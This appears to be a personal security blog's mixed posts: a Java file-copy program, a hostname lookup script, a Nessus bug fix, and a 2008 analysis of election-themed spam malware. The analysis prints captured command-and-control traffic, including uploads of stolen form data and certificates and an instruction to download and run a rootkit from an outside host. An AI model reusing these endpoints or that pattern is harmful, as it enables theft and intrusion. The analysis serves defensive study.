/*
/*
 * To change this template, choose Tools | Templates
 * and open the template in the editor.
 */
package filereader;
 
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
 
/**
 *
 * @author dphegarty
 */
public class Main {
 
    /**
     * @param args the command line arguments
     */
    public static void main(String[] args) {
        Main m = new Main();
        m.writeFile(m.readFile());
    }
 
    public void writeFile(ByteArrayOutputStream content) {
        File file = null;
        FileOutputStream fis = null;
        DataOutputStream dis = null;
        ByteArrayInputStream inContent = new ByteArrayInputStream(content.toByteArray());
 
        try {
            file = new File("/Users/JSmith/About Stacks.pdf");
            file.createNewFile();
            fis = new FileOutputStream(file);
            dis = new DataOutputStream(fis);
            while (inContent.available() != 0) {
                dis.write(inContent.read());
            }
            dis.flush();
            dis.close();
            inContent.close();
        } catch (Exception ex) {
 
        }
    }
 
    public ByteArrayOutputStream readFile() {
        File file = null;
        FileInputStream fis = null;
        DataInputStream dis = null;
        ByteArrayOutputStream content = new ByteArrayOutputStream();
 
        try {
            file = new File("/Users/JSmith/Documents/About Stacks.pdf");
            fis = new FileInputStream(file);
            dis = new DataInputStream(fis);
            while (dis.available() != 0) {
                content.write(dis.read());
            }
            dis.close();
            fis.close();
        } catch (Exception ex) {
        }
        System.out.println("Size: " + content.size() + " File: " + file.length());
        return content;
    }
}
 

sudo apt-get install wmi-client

This handy package installs winexe and wmic on Ubuntu. Winexe is basically PSExec.exe for Linux.

Ah the beauty!

 
dpkg --get-selections > installed-software
 

The original thread can be found here: Orginal

http://www.iltanet.org/communications/transcript_detail.aspx?nvID=000000011405&h4ID=000001426705

Dave and I are looking for feedback so please let us know. Even if it's a simple, "You suck." At least than we know someone is listen and that we need to improve.

http://www.iltanet.org/communications/transcript_detail.aspx?nvID=000000011405&h4ID=000001387805

Since there were only two patches this month we were able to use more of a discussion format for this podcast. I feel we are getting better and more "at home" with doing these podcasts, but other may have a different opinions

Take a listen and feel free to give any feed back.

Email Contents:

Barack Obama Elected 44th President of United States
Barack Obama, unknown to most Americans just four years ago, will become the 44th president and
the first African-American president of the United States.
Watch His amazing speech at November 5!

A link to http://{removed}">Proceed to the election results news page

2008 American Government Official Website

This site delivers information about current U.S. Foreign policy and about American life and culture.

The URL domains are randomly generated and hosted from slaves with in the Bot network. As of today these URLs do resolve or host blank pages. We also noted that the 2 domains were registered on November 4th and originated in China, a before we started receiving the spam messages.

verifyonenet.exacttrget.sessionervlet.1otmvxgjb.securitychallenge.communitypage.rn1mnqinq.bfiinwach.com
 - Domain no longer resolvable

carehtmlclient.viewcontent.productsremote.3xnhnoe9x.customerlogin.verification.wqvnskxwk.gerimumsoe.com
 - Domain no longer resolvable

When the user visits the site, it will prompt the user to download and install adobe_flash9.exe every 11 second. This download prompt is accomplished through the use of the Refresh Meta tag. It is not a JavaScript.

Once the download is complete, Windows prompts the user to run the executable. When the executable is run it deletes the adobe_flash6.exe and creates a running process named 9129837.exe based in C:\Windows. The name of this new program is constant across all the different test machines we ran it on as well as on the live machines of people who executed it.

In our case the 9129837.exe tried to injected code into the running user process Explorer.exe. This is standard behavior so the malware becomes invisible in the task manager. On XP the Security Center was disable, firewall turned off and the we were unable to bring up the task manager. The 9129837.exe also connected to what appears to be a command and control site for instructions and to upload key information. One of the first instructions was to down load part of a root kit del.exe from a separate domain.

Here are the http communications between the infect machine and C&C. On each host the order of requests was not the same, only the request to the pstore.cgi was 1st.

Server: 91.203.93.57

Query the RIPE Database
Search for
Switch to the RIPE TEST Database

% This is the RIPE Whois query server #2.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Note: This output has been filtered.
%       To receive output for a database update, use the "-B" flag

% Information related to '91.203.93.1 - 91.203.93.128'

inetnum:         91.203.93.1 - 91.203.93.128
netname:         ZHITOMIR-NET
descr:           pool for co-location customers
country:         UA
admin-c:         ML7676-RIPE
tech-c:          ML7676-RIPE
status:          ASSIGNED PI "status:" definitions
mnt-by:          UATELECOM-MNT
source:          RIPE # Filtered

person:          Mark Liberman
address:         Kiev, Ukraine
e-mail:          m.liberman@uatelecom.com.ua
phone:           +380963801326
nic-hdl:         ML7676-RIPE
source:          RIPE # Filtered

% Information related to '91.203.92.0/22AS44997'

route:           91.203.92.0/22
descr:           BTG-AS
origin:          AS44997
mnt-by:          UATELECOM-MNT
remarks:         responsible: abuse@uatelecom.com.ua
source:          RIPE # Filtered

Request and Response 1

POST /cgi-bin/pstore.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------13c89313c89313c893
User-Agent: IE
Host: 91.203.93.57
Content-Length: 229
Cache-Control: no-cache

----------------------------13c89313c89313c893
Content-Disposition: form-data; name="upload_file"; filename="160856006.5"
Content-Type: application/octet-stream

Forms: 

----------------------------13c89313c89313c893--
HTTP/1.1 200 OK
Connection: close
Content-type: text/html
Content-Length: 3
Date: Wed, 05 Nov 2008 18:38:31 GMT
Server: lighttpd/1.4.20

ok!

Request and response 2

GET /cgi-bin/options.cgi?user_id=160856006&version_id=5&p... HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.203.93.57
Connection: Keep-Alive

HTTP/1.1 200 OK
Connection: close
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-type: octet/stream
Content-Length: 14
Date: Wed, 05 Nov 2008 18:38:32 GMT

Server: lighttpd/1.4.20

(...........e0

Request and Response 3

GET /cgi-bin/cmd.cgi?user_id=160856006&version_id=5&p... HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.203.93.57
Connection: Keep-Alive

HTTP/1.1 200 OK
Connection: close
Pragma: no-cache
Last-Modified: Wed, 5 Nov 2008 18:38:31 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-type: text/plain
Content-Length: 35
Date: Wed, 05 Nov 2008 18:38:31 GMT
Server: lighttpd/1.4.20

DL_EXE=http://solecokes.com/del.exe

Request and Response 4

POST /cgi-bin/cert.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------13cc7b13cc7b13cc7b
User-Agent: IE
Host: 91.203.93.57
Content-Length: 303
Cache-Control: no-cache

----------------------------13cc7b13cc7b13cc7b
Content-Disposition: form-data; name="upload_file"; filename="160856006.5"
Content-Type: application/octet-stream

0S...0...*.H..
.......0.0;0.0...+........5......&u8.I.>../z...w..=C..C.>l."..`p......
----------------------------13cc7b13cc7b13cc7b--
HTTP/1.1 200 OK
Connection: close
Content-type: text/html
Content-Length: 3
Date: Wed, 05 Nov 2008 18:38:32 GMT
Server: lighttpd/1.4.20

ok!

The target machine now contacts solecokes.com as directed to download part of the rootkit as defined by the DL_EXE reponse

GET /del.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: solecokes.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Wed, 05 Nov 2008 18:38:25 GMT
Server: Apache
Last-Modified: Mon, 03 Nov 2008 21:06:19 GMT
ETag: "400099-6000-518148c0"
Accept-Ranges: bytes
Content-Length: 24576
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream

{Binary data remote}

As of this morning at 06:00 the solecokes.com resolves to several different IP address:

Non-authoritative answer:
Name:	solecokes.com
Address: 190.95.28.108
Name:	solecokes.com
Address: 221.213.78.6
Name:	solecokes.com
Address: 81.247.61.210
Name:	solecokes.com
Address: 82.83.199.100
Name:	solecokes.com
Address: 121.113.166.191

Yesterday, 11/5, at 12:42 the same domain resolved to:

Non-authoritative answer:
Name:	solecokes.com
Address: 89.102.187.216
Name:	solecokes.com
Address: 90.183.68.7
Name:	solecokes.com
Address: 81.242.197.189
Name:	solecokes.com
Address: 87.207.9.23

It is pretty obvious that the solecokes.com domain is part of a dynamic DNS scheme. I would not doubt that these IP resolve to bot hosts.

A DNS lookup on 87.207.9.23 reveals:

Non-authoritative answer:
23.9.207.87.in-addr.arpa	name = chello087207009023.chello.pl.

and DNS lookup on 81.242.197.189 pretty much seals the deal that these are just bots hosting temporary malware sites.

Non-authoritative answer:
189.197.242.81.in-addr.arpa	name = 189.197-242-81.adsl-dyn.isp.belgacom.be.

A little digging around the root of this site displays a Wachovia error page. As it turns out this site was used as a malicious site to trick Wachovia users during the buy out by Wells Fargo. The bot network admins realized the opportunity present with the election of Mr. Obama and quickly retooled the site to accommodate that. This highlights how fast the malware sites and bot net admins can quickly change gears to make use of opportunities as they present them selves.

Input file syntax:

Host1
Host2
Host3

Script:

#!/bin/bash
#
# Convert Windows NetBOIS Hostname to IP
# First tries WINS and if that fails it tries DNS
#
SEARCH_FILE=$1
 
TIME=`date +%s`
BASE=`echo $1 | cut -d. -f1`
GOOD="${BASE}_ip_${TIME}.txt"
BAD="${BASE}_noip_${TIME}.txt"
NO_PING="${BASE}_noping_${TIME}.txt"
WINS="1.1.1.1"
 
for i in $(cat $SEARCH_FILE); do
  IP=`nmblookup -U $WINS -R $i | grep \<00\> | sed -e 's/&lt;00&gt;//g' | cut -d\  -f1 | head -1`
  if [ $IP"M" == "M" ]; then
    IP=`nslookup $i | grep Address | grep -v \# | tail -1 | cut -d\  -f2`
    if [ $IP"M" == "M" ]; then
      LOGFILE=$GOOD
      IP=$i
    else
      LOGFILE=$NO_PING;
    fi
  else
    LOGFILE=$BAD;
  fi
  echo $IP >> $LOGFILE;
done

The script spits out a couple of file as defined by the GOOD and BAD variables.

GOOD file contains all the successfully lookups

BAD file contains all the failed lookups

If you find it handy let me know.

The bug is in the /usr/local/bin/nessus_scan.pl when it updates the nessus_scan table around line number 193 in my version of the script:

         # set a scan schedule to a running state
           my $sth_updnsr = $dbhf->prepare(qq{
           UPDATE nessus_scan
           SET status="R", start_dttm=now(), process_id=?
           WHERE server_id=?
           AND sched_id=?
           } );

This bit of code updates every scan row to a running state even if it has completed. So when all scans are done the clean up process can not happen. It's not a major bug but the schedule that ran is never marked complete and can not be executed again until all the running scans are cleaned up.

To fix this issue just modify the bit of code above and add another section to the where clause "ADD end_dttm IS NULL".

         # set a scan schedule to a running state
           my $sth_updnsr = $dbhf->prepare(qq{
           UPDATE nessus_scan
           SET status="R", start_dttm=now(), process_id=?
           WHERE server_id=?
           AND sched_id=?
           AND end_dttm IS NULL
           } );

Now the scans will be marked as completed and the system can clean everything up and mark the schedule finished.

Risk Management Peer Group Podcasts

So I am splitting the site into two, this is going to be the tech and security focused side of me. I love working in the tech sector. I have a passion for Linux/UNIX environments and scripting/light programming, oh and I will work on Windows . Above all else I really enjoy solving problems with scripts be it a UNIX or Windows environment.

This site will be an outlet for my scripting ideas and security related information. I look forward to sharing my knowledge and other tidbits I find.

Thanks!